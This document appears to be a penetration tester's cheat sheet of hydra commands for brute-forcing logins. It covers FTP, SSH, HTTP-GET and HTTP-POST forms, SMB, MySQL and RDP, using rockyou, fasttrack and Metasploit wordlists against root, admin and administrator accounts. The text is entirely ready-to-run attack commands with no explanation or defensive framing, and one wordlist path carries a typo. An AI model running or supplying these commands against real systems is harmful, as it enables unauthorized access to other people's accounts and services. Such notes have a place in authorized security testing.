Bruteforce4all

#initial-access
#bruteforce
#red

Bruteforce4all

FTP

hydra -l root -P /usr/share/wordlists/fasttrack.txt ftp://<IP>
hydra -L /usr/share/wordlists/metasploit/common_roots.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt ftp://<IP>

SSH

hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://<IP>
hydra -L /usr/share/wordlists/metasploit/common_roots.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh://<IP>

HTTP-GET

hydra -l administrator -P /usr/share/wordlists/rockyou.txt <IP> http-get /webdav/
hydra -L /usr/share/wordlists/metasploit/common_roots.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt <IP> http-get /webdav/

HTTP-POST

hydra -l administrator -P /usr/share/wordlists/rockyou.txt <IP> http-post-form "/login.php:username=^USER^&password=^PASS^:Unknown user or password incorrect."

SMB

hydra -l administrator -P /usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txtt smb://<IP>
hydra -L /usr/share/wordlists/metasploit/common_roots.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt smb://<IP>

MYSQL

hydra -l dbadmin -P /usr/share/wordlists/fasttrack.txt mysql://<IP>

RDP

hydra -L /usr/share/wordlists/metasploit/common_roots.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt rdp://<IP> -s <PORT>